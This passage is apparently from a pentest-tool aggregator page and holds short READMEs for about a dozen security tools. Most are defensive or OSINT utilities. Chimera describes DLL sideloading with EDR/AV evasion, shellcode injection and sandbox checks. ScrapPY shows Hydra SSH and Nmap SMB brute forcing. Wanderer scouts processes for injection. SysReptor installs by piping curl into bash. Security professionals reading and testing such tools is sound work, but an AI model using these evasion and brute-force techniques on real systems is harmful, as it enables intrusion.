  2. Focus on time, it is recommended to start the decryption between the first 2 to 10 seconds, so you have an advantage to generate the correct key formation.

License

The content of this project itself is licensed under the Creative Commons Attribution 3.0 license, and the underlying source code used to format and display that content is licensed under the MIT license.

Copyright (c) 2023 by Jose Pino



☐ β˜† βœ‡ KitPloit - PenTest Tools!

Bryobio - NETWORK Pcap File Analysis

By: Zion3R β€” August 18th 2023 at 12:30


NETWORK Pcap File Analysis, It was developed to speed up the processes of SOC Analysts during analysis


Tested

OK Debian
OK Ubuntu

Requirements

$ pip install pyshark
$ pip install dpkt

$ Wireshark
$ Tshark
$ Mergecap
$ Ngrep

π—œπ—‘π—¦π—§π—”π—Ÿπ—Ÿπ—”π—§π—œπ—’π—‘ π—œπ—‘π—¦π—§π—₯π—¨π—–π—§π—œπ—’π—‘π—¦

$ https://github.com/emrekybs/Bryobio.git
$ cd Bryobio
$ chmod +x bryobio.py

$ python3 bryobio.py



☐ β˜† βœ‡ KitPloit - PenTest Tools!

HackBot - A Simple Cli Chatbot Having Llama2 As Its Backend Chat AI

By: Zion3R β€” August 17th 2023 at 12:30


Welcome to HackBot, an AI-powered cybersecurity chatbot designed to provide helpful and accurate answers to your cybersecurity-related queries and also do code analysis and scan analysis. Whether you are a security researcher, an ethical hacker, or just curious about cybersecurity, HackBot is here to assist you in finding the information you need.

HackBot utilizes the powerful language model Meta-LLama2 through the "LlamaCpp" library. This allows HackBot to respond to your questions in a coherent and relevant manner. Please make sure to keep your queries in English and adhere to the guidelines provided to get the best results from HackBot.


Features

  • AI Cybersecurity Chat: HackBot can answer various cybersecurity-related queries, helping you with penetration testing, security analysis, and more.
  • Interactive Interface: The chatbot provides an interactive command-line interface, making it easy to have conversations with HackBot.
  • Clear Output: HackBot presents its responses in a well-formatted markdown, providing easily readable and organized answers.
  • Static Code Analysis: Utilizes the provided scan data or log file for conducting static code analysis. It thoroughly examines the source code without executing it, identifying potential vulnerabilities, coding errors, and security issues.
  • Vulnerability Analysis: Performs a comprehensive vulnerability analysis using the provided scan data or log file. It identifies and assesses security weaknesses, misconfigurations, and potential exploits present in the target system or network.

How it looks

Chat:

Static Code analysis:

Vulnerability analysis:

Installation

Prerequisites

Before you proceed with the installation, ensure you have the following prerequisites:

Step 1: Clone the Repository

git clone https://github.com/morpheuslord/hackbot.git
cd hackbot

Step 2: Install Dependencies

pip install -r requirements.txt

Step 3: Download the AI Model

python hackbot.py

The first time you run HackBot, it will check for the AI model required for the chatbot. If the model is not present, it will be automatically downloaded and saved as "llama-2-7b-chat.ggmlv3.q4_0.bin" in the project directory.

Usage

To start a conversation with HackBot, run the following command:

python hackbot.py

HackBot will display a banner and wait for your input. You can ask cybersecurity-related questions, and HackBot will respond with informative answers. To exit the chat, simply type "quit_bot" in the input prompt.

Here are some additional commands you can use:

  • clear_screen: Clears the console screen for better readability.
  • quit_bot: This is used to quit the chat application
  • bot_banner: Prints the default bots banner.
  • contact_dev: Provides my contact information.
  • save_chat: Saves the current sessions interactions.
  • vuln_analysis: Does a Vuln analysis using the scan data or log file.
  • static_code_analysis: Does a Static code analysis using the scan data or log file.

Note: I am working on more addons and more such commands to give a more chatGPT experience

Please Note: HackBot's responses are based on the Meta-LLama2 AI model, and its accuracy depends on the quality of the queries and data provided to it.

I am also working on AI training by which I can teach it how to be more accurately tuned to work for hackers on a much more professional level.

Contributing

We welcome contributions to improve HackBot's functionality and accuracy. If you encounter any issues or have suggestions for enhancements, please feel free to open an issue or submit a pull request. Follow these steps to contribute:

  1. Fork the repository.
  2. Create a new branch with a descriptive name.
  3. Make your changes and commit them.
  4. Push your changes to your forked repository.
  5. Open a pull request to the main branch of this repository.

Please maintain a clean commit history and adhere to the project's coding guidelines.

AI training

If anyone with the know-how of training text generation models can help improve the code.

Contact

For any questions, feedback, or inquiries related to HackBot, feel free to contact the project maintainer:



☐ β˜† βœ‡ KitPloit - PenTest Tools!

InfoHound - An OSINT To Extract A Large Amount Of Data Given A Web Domain Name

By: Zion3R β€” August 16th 2023 at 20:58


During the reconnaissance phase, an attacker searches for any information about his target to create a profile that will later help him to identify possible ways to get in an organization. InfoHound performs passive analysis techniques (which do not interact directly with the target) using OSINT to extract a large amount of data given a web domain name. This tool will retrieve emails, people, files, subdomains, usernames and urls that will be later analyzed to extract even more valuable information.


Infohound architecture

Installation

git clone https://github.com/xampla/InfoHound.git
cd InfoHound/infohound
mv infohound_config.sample.py infohound_config.py
cd ..
docker-compose up -d

You must add API Keys inside infohound_config.py file

Default modules

InfoHound has 2 different types of modules, those which retreives data and those which analyse it to extract more relevant information.

 Retrievval modules

Name Description
Get Whois Info Get relevant information from Whois register.
Get DNS Records This task queries the DNS.
Get Subdomains This task uses Alienvault OTX API, CRT.sh, and HackerTarget as data sources to discover cached subdomains.
Get Subdomains From URLs Once some tasks have been performed, the URLs table will have a lot of entries. This task will check all the URLs to find new subdomains.
Get URLs It searches all URLs cached by Wayback Machine and saves them into the database. This will later help to discover other data entities like files or subdomains.
Get Files from URLs It loops through the URLs database table to find files and store them in the Files database table for later analysis. The files that will be retrieved are: doc, docx, ppt, pptx, pps, ppsx, xls, xlsx, odt, ods, odg, odp, sxw, sxc, sxi, pdf, wpd, svg, indd, rdp, ica, zip, rar
Find Email It looks for emails using queries to Google and Bing.
Find People from Emails Once some emails have been found, it can be useful to discover the person behind them. Also, it finds usernames from those people.
Find Emails From URLs Sometimes, the discovered URLs can contain sensitive information. This task retrieves all the emails from URL paths.
Execute Dorks It will execute the dorks defined in the dorks folder. Remember to group the dorks by categories (filename) to understand their objectives.
Find Emails From Dorks By default, InfoHound has some dorks defined to discover emails. This task will look for them in the results obtained from dork execution.

Analysis

Name Description
Check Subdomains Take-Over It performs some checks to determine if a subdomain can be taken over.
Check If Domain Can Be Spoofed It checks if a domain, from the emails InfoHound has discovered, can be spoofed. This could be used by attackers to impersonate a person and send emails as him/her.
Get Profiles From Usernames This task uses the discovered usernames from each person to find profiles from services or social networks where that username exists. This is performed using the Maigret tool. It is worth noting that although a profile with the same username is found, it does not necessarily mean it belongs to the person being analyzed.
Download All Files Once files have been stored in the Files database table, this task will download them in the "download_files" folder.
Get Metadata Using exiftool, this task will extract all the metadata from the downloaded files and save it to the database.
Get Emails From Metadata As some metadata can contain emails, this task will retrieve all of them and save them to the database.
Get Emails From Files Content Usually, emails can be included in corporate files, so this task will retrieve all the emails from the downloaded files' content.
Find Registered Services using Emails It is possible to find services or social networks where an email has been used to create an account. This task will check if an email InfoHound has discovered has an account in Twitter, Adobe, Facebook, Imgur, Mewe, Parler, Rumble, Snapchat, Wordpress, and/or Duolingo.
Check Breach This task checks Firefox Monitor service to see if an email has been found in a data breach. Although it is a free service, it has a limitation of 10 queries per day. If Leak-Lookup API key is set, it also checks it.

Custom modules

InfoHound lets you create custom modules, you just need to add your script inside infohoudn/tool/custom_modules. One custome module has been added as an example which uses Holehe tool to check if the emails previously are attached to an account on sites like Twitter, Instagram, Imgur and more than 120 others.

Inspired by



☐ β˜† βœ‡ KitPloit - PenTest Tools!

Chimera - Automated DLL Sideloading Tool With EDR Evasion Capabilities

By: Zion3R β€” August 14th 2023 at 12:30


While DLL sideloading can be used for legitimate purposes, such as loading necessary libraries for a program to function, it can also be used for malicious purposes. Attackers can use DLL sideloading to execute arbitrary code on a target system, often by exploiting vulnerabilities in legitimate applications that are used to load DLLs.

To automate the DLL sideloading process and make it more effective, Chimera was created a tool that include evasion methodologies to bypass EDR/AV products. These tool can automatically encrypt a shellcode via XOR with a random key and create template Images that can be imported into Visual Studio to create a malicious DLL.

Also Dynamic Syscalls from SysWhispers2 is used and a modified assembly version to evade the pattern that the EDR search for, Random nop sleds are added and also registers are moved. Furthermore Early Bird Injection is also used to inject the shellcode in another process which the user can specify with Sandbox Evasion mechanisms like HardDisk check & if the process is being debugged. Finally Timing attack is placed in the loader which using waitable timers to delay the execution of the shellcode.

This tool has been tested and shown to be effective at bypassing EDR/AV products and executing arbitrary code on a target system.


Tool Usage

Chimera is written in python3 and there is no need to install any extra dependencies.

Chimera currently supports two DLL options either Microsoft teams or Microsoft OneDrive.

Someone can create userenv.dll which is a missing DLL from Microsoft Teams and insert it to the specific folder to

⁠%USERPROFILE%/Appdata/local/Microsoft/Teams/current

For Microsoft OneDrive the script uses version DLL which is common because its missing from the binary example onedriveupdater.exe

Chimera Usage.

python3 ./chimera.py met.bin chimera_automation notepad.exe teams

python3 ./chimera.py met.bin chimera_automation notepad.exe onedrive

Additional Options

  • [raw payload file] : Path to file containing shellcode
  • [output path] : Path to output the C template file
  • [process name] : Name of process to inject shellcode into
  • [dll_exports] : Specify which DLL Exports you want to use either teams or onedrive
  • [replace shellcode variable name] : [Optional] Replace shellcode variable name with a unique name
  • [replace xor encryption name] : [Optional] Replace xor encryption name with a unique name
  • [replace key variable name] : [Optional] Replace key variable name with a unique name
  • [replace sleep time via waitable timers] : [Optional] Replace sleep time your own sleep time

Usefull Note

Once the compilation process is complete, a DLL will be generated, which should include either "version.dll" for OneDrive or "userenv.dll" for Microsoft Teams. Next, it is necessary to rename the original DLLs.

For instance, the original "userenv.dll" should be renamed as "tmpB0F7.dll," while the original "version.dll" should be renamed as "tmp44BC.dll." Additionally, you have the option to modify the name of the proxy DLL as desired by altering the source code of the DLL exports instead of using the default script names.

Visual Studio Project Setup

Step 1: Creating a New Visual Studio Project with DLL Template

  1. Launch Visual Studio and click on "Create a new project" or go to "File" -> "New" -> "Project."
  2. In the project templates window, select "Visual C++" from the left-hand side.
  3. Choose "Empty Project" from the available templates.
  4. Provide a suitable name and location for the project, then click "OK."
  5. On the project properties window, navigate to "Configuration Properties" -> "General" and set the "Configuration Type" to "Dynamic Library (.dll)."
  6. Configure other project settings as desired and save the project.Β 

Β 

Step 2: Importing Images into the Visual Studio Project

  1. Locate the "chimera_automation" folder containing the necessary Images.
  2. Open the folder and identify the following Images: main.c, syscalls.c, syscallsstubs.std.x64.asm.
  3. In Visual Studio, right-click on the project in the "Solution Explorer" panel and select "Add" -> "Existing Item."
  4. Browse to the location of each file (main.c, syscalls.c, syscallsstubs.std.x64.asm) and select them one by one. Click "Add" to import them into the project.
  5. Create a folder named "header_Images" within the project directory if it doesn't exist already.
  6. Locate the "syscalls.h" header file in the "header_Images" folder of the "chimera_automation" directory.
  7. Right-click on the "header_Images" folder in Visual Studio's "Solution Explorer" panel and select "Add" -> "Existing Item."
  8. Browse to the location of "syscalls.h" and select it. Click "Add" to import it into the project.

Step 3: Build Customization

  1. In the project properties window, navigate to "Configuration Properties" -> "Build Customizations."
  2. Click the "Build Customizations" button to open the build customization dialog.

Step 4: Enable MASM

  1. In the build customization dialog, check the box next to "masm" to enable it.
  2. Click "OK" to close the build customization dialog.

Β 

Step 5:

  1. Right click in the assembly file β†’ properties and choose the following
  2. Exclude from build β†’ No
  3. Content β†’ Yes
  4. Item type β†’ Microsoft Macro Assembler


Final Project Setup


Compiler Optimizations

Step 1: Change optimization

  1. In Visual Studio choose Project β†’ properties
  2. C/C++ Optimization and change to the following

Β 

Step 2: Remove Debug Information's

  1. In Visual Studio choose Project β†’ properties
  2. Linker β†’ Debugging β†’ Generate Debug Info β†’ No


Liability Disclaimer:

To the maximum extent permitted by applicable law, myself(George Sotiriadis) and/or affiliates who have submitted content to my repo, shall not be liable for any indirect, incidental, special, consequential or punitive damages, or any loss of profits or revenue, whether incurred directly or indirectly, or any loss of data, use, goodwill, or other intangible losses, resulting from (i) your access to this resource and/or inability to access this resource; (ii) any conduct or content of any third party referenced by this resource, including without limitation, any defamatory, offensive or illegal conduct or other users or third parties; (iii) any content obtained from this resource

References

https://www.ired.team/offensive-security/code-injection-process-injection/early-bird-apc-queue-code-injection

https://evasions.checkpoint.com/

https://github.com/Flangvik/SharpDllProxy

https://github.com/jthuraisamy/SysWhispers2

https://systemweakness.com/on-disk-detection-bypass-avs-edr-s-using-syscalls-with-legacy-instruction-series-of-instructions-5c1f31d1af7d

https://github.com/Mr-Un1k0d3r



☐ β˜† βœ‡ KitPloit - PenTest Tools!

Artemis - APK Infrastructure Investigator

By: Zion3R β€” July 29th 2023 at 12:30

Overview

A tools for Find APK Infrastructure .

HADESS performs offensive cybersecurity services through infrastructures and software that include vulnerability analysis, scenario attack planning, and implementation of custom integrated preventive projects. We organized our activities around the prevention of corporate, industrial, and laboratory cyber threats.


Installation

pip install -r requirements.txt  
python main.py

Command Line Options

          
--help Display help
--path Required path of apk file
--manifest Display manifest informations
--infra Find all infra addresses included ip,domain ex. --infra ip,domain
--whoise Whoise all infra included ip,domain ex. --whoise ip,domain
--output Set output files ex. --output out.txt

Usage

Display Manifest

APK Infrastructure Investigator (3)

IP Whois

APK Infrastructure Investigator (4)

Example Usage:

1.Find infra(domain and ip) in sample4.apk and set output result into out.txt

python3 main.py --path sample4.apk --infra domain,ip --output out.txt
  1. Investigate the Domain and IP on the APK
python3 main.py --path sample.apk --whois ip


☐ β˜† βœ‡ KitPloit - PenTest Tools!

Sysreptor - Fully Customisable, Offensive Security Reporting Tool Designed For Pentesters, Red Teamers And Other Security-Related People Alike

By: Zion3R β€” July 14th 2023 at 12:30


Easy and customisable pentest report creator based on simple web technologies.

SysReptor is a fully customisable, offensive security reporting tool designed for pentesters, red teamers and other security-related people alike. You can create designs based on simple HTML and CSS, write your reports in user-friendly Markdown and convert them to PDF with just a single click, in the cloud or on-premise!


Your Benefits

Write in markdown
Design in HTML/VueJS
Render your report to PDF
Fully customizable
Self-hosted or Cloud
No need for Word

SysReptor Cloud

You just want to start reporting and save yourself all the effort of setting up, configuring and maintaining a dedicated server? Then SysReptor Cloud is the right choice for you! Get to know SysReptor on our Playground and if you like it, you can get your personal Cloud instance here:

οš€
Sign up here


SysReptor Self-Hosted

You prefer self-hosting? That's fine! You will need:

  • Ubuntu
  • Latest Docker (with docker-compose-plugin)

You can then install SysReptor with via script:

curl -s https://docs.sysreptor.com/install.sh | bash

After successful installation, access your application at http://localhost:8000/.

Get detailed installation instructions at Installation.





☐ β˜† βœ‡ KitPloit - PenTest Tools!

ZeusCloud - Open Source Cloud Security

By: Zion3R β€” July 13th 2023 at 12:30


ZeusCloud is an open source cloud security platform.

Discover, prioritize, and remediate your risks in the cloud.

  • Build an asset inventory of your AWS accounts.
  • Discover attack paths based on public exposure, IAM, vulnerabilities, and more.
  • Prioritize findings with graphical context.
  • Remediate findings with step by step instructions.
  • Customize security and compliance controls to fit your needs.
  • Meet compliance standards PCI DSS, CIS, SOC 2, and more!

Quick Start

  1. Clone repo: git clone --recurse-submodules git@github.com:Zeus-Labs/ZeusCloud.git
  2. Run: cd ZeusCloud && make quick-deploy
  3. Visit http://localhost:80

Check out our Get Started guide for more details.

A cloud-hosted version is available on special request - email founders@zeuscloud.io to get access!

Sandbox

Play around with our sandbox environment to see how ZeusCloud identifies, prioritizes, and remediates risks in the cloud!

Features

  • Discover Attack Paths - Discover toxic risk combinations an attacker can use to penetrate your environment.
  • Graphical Context - Understand context behind security findings with graphical visualizations.
  • Access Explorer - Visualize who has access to what with an IAM visualization engine.
  • Identify Misconfigurations - Discover the highest risk-of-exploit misconfigurations in your environments.
  • Configurability - Configure which security rules are active, which alerts should be muted, and more.
  • Security as Code - Modify rules or write your own with our extensible security as code approach.
  • Remediation - Follow step by step guides to remediate security findings.
  • Compliance - Ensure your cloud posture is compliant with PCI DSS, CIS benchmarks and more!

Why ZeusCloud?

Cloud usage continues to grow. Companies are shifting more of their workloads from on-prem to the cloud and both adding and expanding new and existing workloads in the cloud. Cloud providers keep increasing their offerings and their complexity. Companies are having trouble keeping track of their security risks as their cloud environment scales and grows more complex. Several high profile attacks have occurred in recent times. Capital One had an S3 bucket breached, Amazon had an unprotected Prime Video server breached, Microsoft had an Azure DevOps server breached, Puma was the victim of ransomware, etc.

We had to take action.

  • We noticed traditional cloud security tools are opaque, confusing, time consuming to set up, and expensive as you scale your cloud environment
  • Cybersecurity vendors don't provide much actionable information to security, engineering, and devops teams by inundating them with non-contextual alerts
  • ZeusCloud is easy to set up, transparent, and configurable, so you can prioritize the most important risks
  • Best of all, you can use ZeusCloud for free!

Future Roadmap

  • Integrations with vulnerability scanners
  • Integrations with secret scanners
  • Shift-left: Remediate risks earlier in the SDLC with context from your deployments
  • Support for Azure and GCP environments

Contributing

We love contributions of all sizes. What would be most helpful first:

  • Please give us feedback in our Slack.
  • Open a PR (see our instructions below on developing ZeusCloud locally)
  • Submit a feature request or bug report through Github Issues.

Development

Run containers in development mode:

cd frontend && yarn && cd -
docker-compose down && docker-compose -f docker-compose.dev.yaml --env-file .env.dev up --build

Reset neo4j and/or postgres data with the following:

rm -rf .compose/neo4j
rm -rf .compose/postgres

To develop on frontend, make the the code changes and save.

To develop on backend, run

docker-compose -f docker-compose.dev.yaml --env-file .env.dev up --no-deps --build backend

To access the UI, go to: http://localhost:80.

Security

Please do not run ZeusCloud exposed to the public internet. Use the latest versions of ZeusCloud to get all security related patches. Report any security vulnerabilities to founders@zeuscloud.io.

Open-source vs. cloud-hosted

This repo is freely available under the Apache 2.0 license.

We're working on a cloud-hosted solution which handles deployment and infra management. Contact us at founders@zeuscloud.io for more information!

Special thanks to the amazing Cartography project, which ZeusCloud uses for its asset inventory. Credit to PostHog and Airbyte for inspiration around public-facing materials - like this README!



☐ β˜† βœ‡ KitPloit - PenTest Tools!

SOC-Multitool - A Powerful And User-Friendly Browser Extension That Streamlines Investigations For Security Professionals

By: Zion3R β€” July 6th 2023 at 12:30


Introducing SOC Multi-tool, a free and open-source browser extension that makes investigations faster and more efficient. Now available on the Chrome Web Store and compatible with all Chromium-based browsers such as Microsoft Edge, Chrome, Brave, and Opera.
Now available on Chrome Web Store!


Streamline your investigations

SOC Multi-tool eliminates the need for constant copying and pasting during investigations. Simply highlight the text you want to investigate, right-click, and navigate to the type of data highlighted. The extension will then open new tabs with the results of your investigation.

Modern and feature-rich

The SOC Multi-tool is a modernized multi-tool built from the ground up, with a range of features and capabilities. Some of the key features include:

  • IP Reputation Lookup using VirusTotal & AbuseIPDB
  • IP Info Lookup using Tor relay checker & WHOIS
  • Hash Reputation Lookup using VirusTotal
  • Domain Reputation Lookup using VirusTotal & AbuseIPDB
  • Domain Info Lookup using Alienvault
  • Living off the land binaries Lookup using the LOLBas project
  • Decoding of Base64 & HEX using CyberChef
  • File Extension & Filename Lookup using fileinfo.com & File.net
  • MAC Address manufacturer Lookup using maclookup.com
  • Parsing of UserAgent using user-agents.net
  • Microsoft Error code Lookup using Microsoft's DB
  • Event ID Lookup (Windows, Sharepoint, SQL Server, Exchange, and Sysmon) using ultimatewindowssecurity.com
  • Blockchain Address Lookup using blockchain.com
  • CVE Info using cve.mitre.org

Easy to install

You can easily install the extension by downloading the release from the Chrome Web Store!
If you wish to make edits you can download from the releases page, extract the folder and make your changes.
To load your edited extension turn on developer mode in your browser's extensions settings, click "Load unpacked" and select the extracted folder!


SOC Multi-tool is a community-driven project and the developer encourages users to contribute and share better resources.



☐ β˜† βœ‡ KitPloit - PenTest Tools!

ScrapPY - A Python Utility For Scraping Manuals, Documents, And Other Sensitive PDFs To Generate Wordlists That Can Be Utilized By Offensive Security Tools

By: Zion3R β€” July 4th 2023 at 12:30


ScrapPY is a Python utility for scraping manuals, documents, and other sensitive PDFs to generate targeted wordlists that can be utilized by offensive security tools to perform brute force, forced browsing, and dictionary attacks. ScrapPY performs word frequency, entropy, and metadata analysis, and can run in full output modes to craft custom wordlists for targeted attacks. The tool dives deep to discover keywords and phrases leading to potential passwords or hidden directories, outputting to a text file that is readable by tools such as Hydra, Dirb, and Nmap. Expedite initial access, vulnerability discovery, and lateral movement with ScrapPY!


Install:

Download Repository:

$ mkdir ScrapPY
$ cd ScrapPY/
$ sudo git clone https://github.com/RoseSecurity/ScrapPY.git

Install Dependencies:

$ pip3 install -r requirements.txt

ScrapPY Usage:

usage: ScrapPY.py [-h] [-f FILE] [-m {word-frequency,full,metadata,entropy}] [-o OUTPUT]

Output metadata of document:

$ python3 ScrapPY.py -f example.pdf -m metadata

Output top 100 frequently used keywords to a file name Top_100_Keywords.txt:

$ python3 ScrapPY.py -f example.pdf -m word-frequency -o Top_100_Keywords.txt

Output all keywords to default ScrapPY.txt file:

$ python3 ScrapPY.py -f example.pdf

Output top 100 keywords with highest entropy rating:

$ python3 ScrapPY.py -f example.pdf -m entropy

ScrapPY Output:

# ScrapPY outputs the ScrapPY.txt file or specified name file to the directory in which the tool was ran. To view the first fifty lines of the file, run this command:

$ head -50 ScrapPY.txt

# To see how many words were generated, run this command:

$ wc -l ScrapPY.txt

Integration with Offensive Security Tools:

Easily integrate with tools such as Dirb to expedite the process of discovering hidden subdirectories:

root@RoseSecurity:~# dirb http://192.168.1.123/ /root/ScrapPY/ScrapPY.txt

-----------------
DIRB v2.21
By The Dark Raver
-----------------

START_TIME: Fri May 16 13:41:45 2014
URL_BASE: http://192.168.1.123/
WORDLIST_FILES: /root/ScrapPY/ScrapPY.txt

-----------------

GENERATED WORDS: 4592

---- Scanning URL: http://192.168.1.123/ ----
==> DIRECTORY: http://192.168.1.123/vi/
+ http://192.168.1.123/programming (CODE:200|SIZE:2726)
+ http://192.168.1.123/s7-logic/ (CODE:403|SIZE:1122)
==> DIRECTORY: http://192.168.1.123/config/
==> DIRECTORY: http://192.168.1.123/docs/
==> DIRECTORY: http://192.168.1.123/external/

Utilize ScrapPY with Hydra for advanced brute force attacks:

root@RoseSecurity:~# hydra -l root -P /root/ScrapPY/ScrapPY.txt -t 6 ssh://192.168.1.123
Hydra v7.6 (c)2013 by van Hauser/THC & David Maciejak - for legal purposes only

Hydra (http://www.thc.org/thc-hydra) starting at 2014-05-19 07:53:33
[DATA] 6 tasks, 1 server, 1003 login tries (l:1/p:1003), ~167 tries per task
[DATA] attacking service ssh on port 22

Enhance Nmap scripts with ScrapPY wordlists:

nmap -p445 --script smb-brute.nse --script-args userdb=users.txt,passdb=ScrapPY.txt 192.168.1.123

Future Development:

  • Allow for custom output file naming and increased verbosity
  • Integrate different modes of operation including word frequency analysis
  • Allow for metadata analysis
  • Search for high-entropy data
  • Search for path-like data
  • Implement image OCR to enumerate data from images in PDFs
  • Allow for processing of multiple PDFs


☐ β˜† βœ‡ KitPloit - PenTest Tools!

Wanderer - An Open-Source Process Injection Enumeration Tool Written In C#

By: Zion3R β€” July 3rd 2023 at 12:30


Wanderer is an open-source program that collects information about running processes. This information includes the integrity level, the presence of the AMSI as a loaded module, whether it is running as 64-bit or 32-bit as well as the privilege level of the current process. This information is extremely helpful when building payloads catered to the ideal candidate for process injection.

This is a project that I started working on as I progressed through Offensive Security's PEN-300 course. One of my favorite modules from the course is the process injection & migration section which inspired me to be build a tool to help me be more efficient in during that activity. A special thanks goes out to ShadowKhan who provided valuable feedback which helped provide creative direction to make this utility visually appealing and enhanced its usability with suggested filtering capabilities.


Usage

Injection Enumeration >> https://github.com/gh0x0st Usage: wanderer [target options] <value> [filter options] <value> [output options] <value> Target Options: -i, --id, Target a single or group of processes by their id number -n, --name, Target a single or group of processes by their name -c, --current, Target the current process and reveal the current privilege level -a, --all, Target every running process Filter Options: --include-denied, Include instances where process access is denied --exclude-32, Exclude instances where the process architecture is 32-bit --exclude-64, Exclude instances where the process architecture is 64-bit --exclude-amsiloaded, Exclude instances where amsi.dll is a loaded process module --exclude-amsiunloaded, Exclude instances where amsi is not loaded process module --exclude-integrity, Exclude instances where the process integrity level is a specific value Output Options: --output-nested, Output the results in a nested style view -q, --quiet, Do not output the banner Examples: Enumerate the process with id 12345 C:\> wanderer --id 12345 Enumerate all processes with the names process1 and processs2 C:\> wanderer --name process1,process2 Enumerate the current process privilege level C:\> wanderer --current Enumerate all 32-bit processes C:\wanderer --all --exclude-64 Enumerate all processes where is AMSI is loaded C:\> wanderer --all --exclude-amsiunloaded Enumerate all processes with the names pwsh,powershell,spotify and exclude instances where the integrity level is untrusted or low and exclude 32-bit processes C:\> wanderer --name pwsh,powershell,spotify --exclude-integrity untrusted,low --exclude-32" dir="auto">
PS C:\> .\wanderer.exe

>> Process Injection Enumeration
>> https://github.com/gh0x0st

Usage: wanderer [target options] <value> [filter options] <value> [output options] <value>

Target Options:

-i, --id, Target a single or group of processes by their id number
-n, --name, Target a single or group of processes by their name
-c, --current, Target the current process and reveal the current privilege level
-a, --all, Target every running process

Filter Options:

--include-denied, Include instances where process access is denied
--exclude-32, Exclude instances where the process architecture is 32-bit
--exclude-64, Exclude instances where the process architecture is 64-bit
--exclude-amsiloaded, Exclude instances where amsi.dll is a loaded proces s module
--exclude-amsiunloaded, Exclude instances where amsi is not loaded process module
--exclude-integrity, Exclude instances where the process integrity level is a specific value

Output Options:

--output-nested, Output the results in a nested style view
-q, --quiet, Do not output the banner

Examples:

Enumerate the process with id 12345
C:\> wanderer --id 12345

Enumerate all processes with the names process1 and processs2
C:\> wanderer --name process1,process2

Enumerate the current process privilege level
C:\> wanderer --current

Enumerate all 32-bit processes
C:\wanderer --all --exclude-64

Enumerate all processes where is AMSI is loaded
C:\> wanderer --all --exclude-amsiunloaded

Enumerate all processes with the names pwsh,powershell,spotify and exclude instances where the integrity level is untrusted or low and exclude 32-bit processes
C:\> wanderer --name pwsh,powershell,spotify --exclude-integrity untrusted,low --exclude-32

Screenshots

Example 1

Example 2

Example 3

Example 4

Example 5



☐ β˜† βœ‡ KitPloit - PenTest Tools!

Scanner-and-Patcher - A Web Vulnerability Scanner And Patcher

By: Zion3R β€” June 21st 2023 at 12:30


This tools is very helpful for finding vulnerabilities present in the Web Applications.

  • A web application scanner explores a web application by crawling through its web pages and examines it for security vulnerabilities, which involves generation of malicious inputs and evaluation of application's responses.
    • These scanners are automated tools that scan web applications to look for security vulnerabilities. They test web applications for common security problems such as cross-site scripting (XSS), SQL injection, and cross-site request forgery (CSRF).
    • This scanner uses different tools like nmap, dnswalk, dnsrecon, dnsenum, dnsmap etc in order to scan ports, sites, hosts and network to find vulnerabilites like OpenSSL CCS Injection, Slowloris, Denial of Service, etc.

Tools Used

Serial No. Tool Name Serial No. Tool Name
1 whatweb 2 nmap
3 golismero 4 host
5 wget 6 uniscan
7 wafw00f 8 dirb
9 davtest 10 theharvester
11 xsser 12 fierce
13 dnswalk 14 dnsrecon
15 dnsenum 16 dnsmap
17 dmitry 18 nikto
19 whois 20 lbd
21 wapiti 22 devtest
23 sslyze

Working

Phase 1

  • User has to write:- "python3 web_scan.py (https or http) ://example.com"
  • At first program will note initial time of running, then it will make url with "www.example.com".
  • After this step system will check the internet connection using ping.
  • Functionalities:-
    • To navigate to helper menu write this command:- --help for update --update
    • If user want to skip current scan/test:- CTRL+C
    • To quit the scanner use:- CTRL+Z
    • The program will tell scanning time taken by the tool for a specific test.

Phase 2

  • From here the main function of scanner will start:
  • The scanner will automatically select any tool to start scanning.
  • Scanners that will be used and filename rotation (default: enabled (1)
  • Command that is used to initiate the tool (with parameters and extra params) already given in code
  • After founding vulnerability in web application scanner will classify vulnerability in specific format:-
    • [Responses + Severity (c - critical | h - high | m - medium | l - low | i - informational) + Reference for Vulnerability Definition and Remediation]
    • Here c or critical defines most vulnerability wheres l or low is for least vulnerable system

Definitions:-

  • Critical:- Vulnerabilities that score in the critical range usually have most of the following characteristics: Exploitation of the vulnerability likely results in root-level compromise of servers or infrastructure devices.Exploitation is usually straightforward, in the sense that the attacker does not need any special authentication credentials or knowledge about individual victims, and does not need to persuade a target user, for example via social engineering, into performing any special functions.

  • High:- An attacker can fully compromise the confidentiality, integrity or availability, of a target system without specialized access, user interaction or circumstances that are beyond the attacker’s control. Very likely to allow lateral movement and escalation of attack to other systems on the internal network of the vulnerable application. The vulnerability is difficult to exploit. Exploitation could result in elevated privileges. Exploitation could result in a significant data loss or downtime.

  • Medium:- An attacker can partially compromise the confidentiality, integrity, or availability of a target system. Specialized access, user interaction, or circumstances that are beyond the attacker’s control may be required for an attack to succeed. Very likely to be used in conjunction with other vulnerabilities to escalate an attack.Vulnerabilities that require the attacker to manipulate individual victims via social engineering tactics. Denial of service vulnerabilities that are difficult to set up. Exploits that require an attacker to reside on the same local network as the victim. Vulnerabilities where exploitation provides only very limited access. Vulnerabilities that require user privileges for successful exploitation.

  • Low:- An attacker has limited scope to compromise the confidentiality, integrity, or availability of a target system. Specialized access, user interaction, or circumstances that are beyond the attacker’s control is required for an attack to succeed. Needs to be used in conjunction with other vulnerabilities to escalate an attack.

  • Info:- An attacker can obtain information about the web site. This is not necessarily a vulnerability, but any information which an attacker obtains might be used to more accurately craft an attack at a later date. Recommended to restrict as far as possible any information disclosure.

  • CVSS V3 SCORE RANGE SEVERITY IN ADVISORY
    0.1 - 3.9 Low
    4.0 - 6.9 Medium
    7.0 - 8.9 High
    9.0 - 10.0 Critical

Vulnerabilities

  • After this scanner will show results which inclues:
    • Response time
    • Total time for scanning
    • Class of vulnerability

Remediation

  • Now, Scanner will tell about harmful effects of that specific type vulnerabilility.
  • Scanner tell about sources to know more about the vulnerabilities. (websites).
  • After this step, scanner suggests some remdies to overcome the vulnerabilites.

Phase 3

  • Scanner will Generate a proper report including
    • Total number of vulnerabilities scanned
    • Total number of vulnerabilities skipped
    • Total number of vulnerabilities detected
    • Time taken for total scan
    • Details about each and every vulnerabilites.
  • Writing all scan files output into SA-Debug-ScanLog for debugging purposes under the same directory
  • For Debugging Purposes, You can view the complete output generated by all the tools named SA-Debug-ScanLog.

Use

Use Program as python3 web_scan.py (https or http) ://example.com
--help
--update
Serial No. Vulnerabilities to Scan Serial No. Vulnerabilities to Scan
1 IPv6 2 Wordpress
3 SiteMap/Robot.txt 4 Firewall
5 Slowloris Denial of Service 6 HEARTBLEED
7 POODLE 8 OpenSSL CCS Injection
9 FREAK 10 Firewall
11 LOGJAM 12 FTP Service
13 STUXNET 14 Telnet Service
